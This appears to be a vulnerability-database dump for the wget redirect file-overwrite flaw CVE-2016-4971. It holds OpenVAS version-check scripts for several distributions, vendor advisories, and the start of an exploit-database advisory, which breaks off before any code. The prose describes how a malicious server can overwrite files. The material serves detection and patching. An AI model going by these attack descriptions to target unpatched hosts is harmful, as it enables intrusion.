value:\"https://alas.aws.amazon.com/ALAS-2016-720.html\");\n script_cve_id(\"CVE-2016-4971\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"wget-debuginfo\", rpm:\"wget-debuginfo~1.18~1.18.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"wget\", rpm:\"wget~1.18~1.18.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:20", "description": "The wget library has been found to contain a vulnerability.", "cvss3": {}, "published": "2017-05-23T00:00:00", "type": "openvas", "title": "Palo Alto PAN-OS WGET Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106827", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106827", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_panos_pan_sa-2017_0016.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Palo Alto PAN-OS WGET Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/o:paloaltonetworks:pan-os';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106827\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-23 15:33:39 +0700 (Tue, 23 May 2017)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_cve_id(\"CVE-2016-4971\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Palo Alto PAN-OS WGET Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Palo Alto PAN-OS Local Security Checks\");\n script_dependencies(\"gb_palo_alto_panOS_version.nasl\");\n script_mandatory_keys(\"palo_alto_pan_os/version\");\n\n script_tag(name:\"summary\", value:\"The wget library has been found to contain a vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"wget allows remote servers to write to arbitrary files by redirecting a\nrequest from HTTP to a crafted FTP resource. Palo Alto Networks software makes use of the vulnerable library and\nmay be affected.\");\n\n script_tag(name:\"affected\", value:\"PAN-OS 6.1.16 and earlier, PAN-OS 7.0.14 and earlier, PAN-OS 7.1.9 and\nearlier, PAN-OS 8.0.\");\n\n script_tag(name:\"solution\", value:\"Update to PAN-OS 6.1.17, PAN-OS 7.0.15, PAN-OS 7.1.10, PAN-OS 8.0.1 or\nlater.\");\n\n script_xref(name:\"URL\", value:\"https://securityadvisories.paloaltonetworks.com/Home/Detail/86\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE, nofork: TRUE))\n exit(0);\n\nmodel = get_kb_item(\"palo_alto_pan_os/model\");\n\nif (version_is_less(version: version, test_version: \"6.1.17\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"6.1.17\");\n if (model)\n report += '\\nModel: ' + model;\n\n security_message(port: 0, data: report);\n exit(0);\n}\n\nif (version =~ \"^7\\.0\") {\n if (version_is_less(version: version, test_version: \"7.0.15\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.0.15\");\n if (model)\n report += '\\nModel: ' + model;\n\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^7\\.1\") {\n if (version_is_less(version: version, test_version: \"7.1.10\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.1.10\");\n if (model)\n report += '\\nModel: ' + model;\n\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^8\\.0\") {\n if (version_is_less(version: version, test_version: \"8.0.1\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.0.1\");\n if (model)\n report += '\\nModel: ' + model;\n\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-06-21T00:00:00", "type": "openvas", "title": "Ubuntu Update for wget USN-3012-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842802", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842802", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for wget USN-3012-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842802\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-21 05:48:01 +0200 (Tue, 21 Jun 2016)\");\n script_cve_id(\"CVE-2016-4971\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for wget USN-3012-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wget'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Dawid Golunski discovered that Wget\n incorrectly handled filenames when being redirected from an HTTP to an FTP URL.\n A malicious server could possibly use this issue to overwrite local files.\");\n script_tag(name:\"affected\", value:\"wget on Ubuntu 16.04 LTS,\n Ubuntu 15.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3012-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3012-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|16\\.04 LTS|15\\.10)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"wget\", ver:\"1.15-1ubuntu1.14.04.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"wget\", ver:\"1.13.4-2ubuntu1.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"wget\", ver:\"1.17.1-1ubuntu1.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU15.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"wget\", ver:\"1.16.1-1ubuntu1.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:30", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-06-19T00:00:00", "type": "openvas", "title": "Fedora Update for wget FEDORA-2016-24135dfe43", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310808463", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808463", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wget FEDORA-2016-24135dfe43\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808463\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-19 05:26:39 +0200 (Sun, 19 Jun 2016)\");\n script_cve_id(\"CVE-2016-4971\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for wget FEDORA-2016-24135dfe43\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wget'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"wget on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-24135dfe43\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PTLXND7DSJYIXQQV4GXOHGEU4OUSL5YM\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"wget\", rpm:\"wget~1.18~1.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-01-27T18:36:54", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for wget (EulerOS-SA-2019-1417)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4877", "CVE-2017-13089", "CVE-2017-13090", "CVE-2018-0494", "CVE-2016-7098", "CVE-2016-4971"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191417", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191417", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1417\");\n script_version(\"2020-01-23T11:43:23+0000\");\n script_cve_id(\"CVE-2014-4877\", \"CVE-2016-4971\", \"CVE-2016-7098\", \"CVE-2017-13089\", \"CVE-2017-13090\", \"CVE-2018-0494\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:43:23 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:43:23 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for wget (EulerOS-SA-2019-1417)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1417\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1417\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'wget' package(s) announced via the EulerOS-SA-2019-1417 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A stack-based buffer overflow when processing chunked, encoded HTTP responses was found in wget. By tricking an unsuspecting user into connecting to a malicious HTTP server, an attacker could exploit this flaw to potentially execute arbitrary code.(CVE-2017-13089)\n\nA flaw was found in the way Wget handled symbolic links. A malicious FTP server could allow Wget running in the mirror mode (using the '-m' command line option) to write an arbitrary file to a location writable to by the user running Wget, possibly leading to code execution.(CVE-2014-4877)\n\nA cookie injection flaw was found in wget. An attacker can create a malicious website which, when accessed, overrides cookies belonging to arbitrary domains.(CVE-2018-0494)\n\nIt was found that wget used a file name provided by the server for the downloaded file when following a HTTP redirect to a FTP server resource. This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client.(CVE-2016-4971)\n\nA heap-based buffer overflow, when processing chunked encoded HTTP responses, was found in wget. By tricking an unsuspecting user into connecting to a malicious HTTP server, an attacker could exploit this flaw to potentially execute arbitrary code.(CVE-2017-13090)\n\nRace condition in wget 1.17 and earlier, when used in recursive or mirroring mode to download a single file, might allow remote servers to bypass intended access list restrictions by keeping an HTTP connection open.(CVE-2016-7098)\");\n\n script_tag(name:\"affected\", value:\"'wget' package(s) on Huawei EulerOS Virtualization 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"wget\", rpm:\"wget~1.14~15.1.h5\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:01:01", "description": "An arbitrary file overwrite vulnerability has been reported in the GNU wget. The vulnerability is due to wget trusting the filename provided by an FTP server when the original request is redirected from an HTTP server. A remote attacker can exploit this vulnerability by enticing a user to request a file over HTTP and sending an HTTP redirect to an FTP location hosting a malicious file intended to overwrite a user file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-07-06T00:00:00", "type": "checkpoint_advisories", "title": "GNU wget HTTP Redirect Arbitrary File Overwrite (CVE-2016-4971)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-07-10T00:00:00", "id": "CPAI-2016-0566", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "description": "GNU Wget is a file retrieval utility which can use either the HTTP or FTP protocols. Wget features include the ability to work in the background while you are logged out, recursive retrieval of directories, file name wildcard matching, remote file timestamp storage and comparison, use of Rest with FTP servers and Range with HTTP servers to retrieve files over slow or unstable connections, support for Proxy servers, and configurability. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-06-18T19:04:34", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: wget-1.18-1.fc24", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-06-18T19:04:34", "id": "FEDORA:4D3E16068708", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/J5ZK7PPOISSBFIAIJP6AV6CDYCCBTL6G/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "GNU Wget is a file retrieval utility which can use either the HTTP or FTP protocols. Wget features include the ability to work in the background while you are logged out, recursive retrieval of directories, file name wildcard matching, remote file timestamp storage and comparison, use of Rest with FTP servers and Range with HTTP servers to retrieve files over slow or unstable connections, support for Proxy servers, and configurability. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-06-18T04:19:51", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: wget-1.18-1.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-06-18T04:19:51", "id": "FEDORA:EE8A96078F47", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/PTLXND7DSJYIXQQV4GXOHGEU4OUSL5YM/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "GNU Wget is a file retrieval utility which can use either the HTTP or FTP protocols. Wget features include the ability to work in the background while you are logged out, recursive retrieval of directories, file name wildcard matching, remote file timestamp storage and comparison, use of Rest with FTP servers and Range with HTTP servers to retrieve files over slow or unstable connections, support for Proxy servers, and configurability. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-06-17T16:02:22", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: wget-1.18-1.fc23", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-06-17T16:02:22", "id": "FEDORA:A52D660A96E6", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/5WRPRG5UOJBMTV4JL7KOKI4WU437DXG4/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:10:50", "description": "GNU wget before 1.18 allows remote servers to write to arbitrary files by\nredirecting a request from HTTP to a crafted FTP resource.\n\n#### Bugs\n\n * <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=827003>\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-06-10T00:00:00", "type": "ubuntucve", "title": "CVE-2016-4971", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-06-10T00:00:00", "id": "UB:CVE-2016-4971", "href": "https://ubuntu.com/security/CVE-2016-4971", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:17", "description": "\nGNU Wget 1.18 - Arbitrary File Upload Remote Code Execution", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-07-06T00:00:00", "title": "GNU Wget 1.18 - Arbitrary File Upload Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-07-06T00:00:00", "id": "EXPLOITPACK:B7D0421EBA79F420787732ED0D8CDB1D", "href": "", "sourceData": "=============================================\n- Release date: 06.07.2016\n- Discovered by: Dawid Golunski\n- Severity: High\n- CVE-2016-4971\n=============================================\n\n\nI. VULNERABILITY\n-------------------------\n\nGNU Wget < 1.18 Arbitrary File Upload / Potential Remote Code Execution\n\n\nII. BACKGROUND\n-------------------------\n\n\"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and \nFTP, the most widely-used Internet protocols. \nIt is a non-interactive commandline tool, so it may easily be called from \nscripts, cron jobs, terminals without X-Windows support, etc.\n\nGNU Wget has many features to make retrieving large files or mirroring entire \nweb or FTP 